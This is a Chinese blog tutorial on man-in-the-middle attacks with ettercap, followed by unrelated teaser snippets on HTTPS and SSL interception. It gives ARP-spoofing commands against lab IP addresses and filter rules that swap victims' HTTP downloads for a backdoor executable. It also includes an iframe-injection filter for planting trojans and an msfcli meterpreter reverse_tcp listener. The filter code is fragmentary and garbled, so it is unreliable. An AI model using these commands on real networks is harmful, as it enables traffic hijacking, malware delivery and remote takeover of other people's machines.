mitm(中間人攻擊)原理及防範初探(一)給大家介紹了利用ettercap進行arp欺騙及劫持明文口令,後來我發現好友
rootoorotor的文章介紹比我寫的更透徹,所以基礎利用大家可以參看他的博文~很棒哦~
這次我會給大家著重介紹在進行mitm時使用到的乙個強大的嗅探工具——ettercap
————————————————分割線————————————————————————–
#./configure&&make&&make install
#./configure&&make&&make plug-ins
#./configure&&make&&make plug-ins_install
win下無腦安裝就不做詳解了
工欲善其事必先利其器,我們先為自己的ettercap建立欺騙規則
預設規則如下:
當然,你也可以建立自己的規則,比如:
# replace rmccurdy with your website
# replace the url with what ever exe you like }
}}這個規則大概是說,把80埠所請求的資料報換成了自己的exe,這是個win32的可執行檔案,然後你可以通過msf生產乙個tcp後門啥的,就把這個位址換到location這裡,然後用命令
etterfilter alert.filter -o alert.e
進行編譯,這裡的詳細操作可以參考rootoorotor同學的第二篇筆記的一段,他描述的比我詳細,也舉例寫了乙個規則
在編譯完成後執行
ettercap -t -q -i vboxnet0 -f exe.ef -m arp如果你感興趣,可以參考這裡的指令碼進行編譯即可進行欺騙
這個指令碼實現的功能是改變80埠所請求的,並用本地替換之
指令碼如下:
編譯一下試試~
然後鍵入命令
ettercap -t -q -i wlan0 -f change.ef -m arp:remote /172.16.1.31/ /172.16.1.1/
(11是我的本機,31是攻擊目標)
之後被攻擊者通過80埠請求的任一都會被替換(我換成了我的,嘿嘿)
當然,想要利用ettercap掛馬也是可以的,真是狂拽炫酷叼(額,因為網內都是宿舍的同學,我就不掛馬了,但是介紹一下方法給大家)
if (ip.proto == tcp && ip.dst != '192.1.1.200' && tcp.dst == 80 || tcp.dst == 8080)
}#–inject iframe–
if (ip.proto == tcp && ip.dst != 』192.1.1.200′ && tcp.src == 80 || tcp.src == 8080)
if (search(data.data, 「」))
}利用msf修改馬兒的位址,然後用同樣的方法編譯指令碼
找乙個不用的埠號監聽,例如
msfcli exploit/multi/handler payload=windows/meterpreter/reverse_tcp lhost=172.16.1.31 lport=1024 e
如此即監聽1024草榴埠(咦,有奇怪的東西混進去了)
然後用ettercap呼叫指令碼
ettercap -tq -i wlan0 -f /usr/share/ettercap/剛剛編譯的檔案位址-m arp:remote /172.16.1.31 /172.16.1.11/
SSL中間人攻擊及防範
1 瀏覽器連線伺服器,伺服器把ssl證書的公鑰傳送給瀏覽器 2 瀏覽器驗證此證書中的域是否和訪問的域一致 比如使用者訪問時,瀏覽器驗證伺服器傳送過來的ssl證書的公鑰中的域是否為mail.google.com或 google.com 並沒有過期 3 如果瀏覽器驗證失敗,瀏覽器通知使用者證書有問題,讓...
HTTPS 原理及中間人攻擊
隨著 https 建站的成本下降,現在大部分的 都已經開始用上 https 協議。大家都知道 https 比 http 安全,也聽說過與 https 協議相關的概念有 ssl 非對稱加密 ca證書等,但對於以下靈魂三拷問可能就答不上了 1 為什麼用了 https 就是安全的?2 https 的底層原...
Https如何防範中間人攻擊
在手機或者電腦和伺服器建立連線的時候,攻擊者通過工具或者技術手段將自己位於兩端之間,獲取資料,進行監聽活動的就是中間人攻擊。1.嗅探,監聽獲取連線資料報。2.資料報注入,將惡意資料報注入常規資料報裡面。因為是合法通訊流,使用者不易察覺。3.會話劫持,登入退出銀行賬戶就是乙個會話。會話中有很多重要資訊...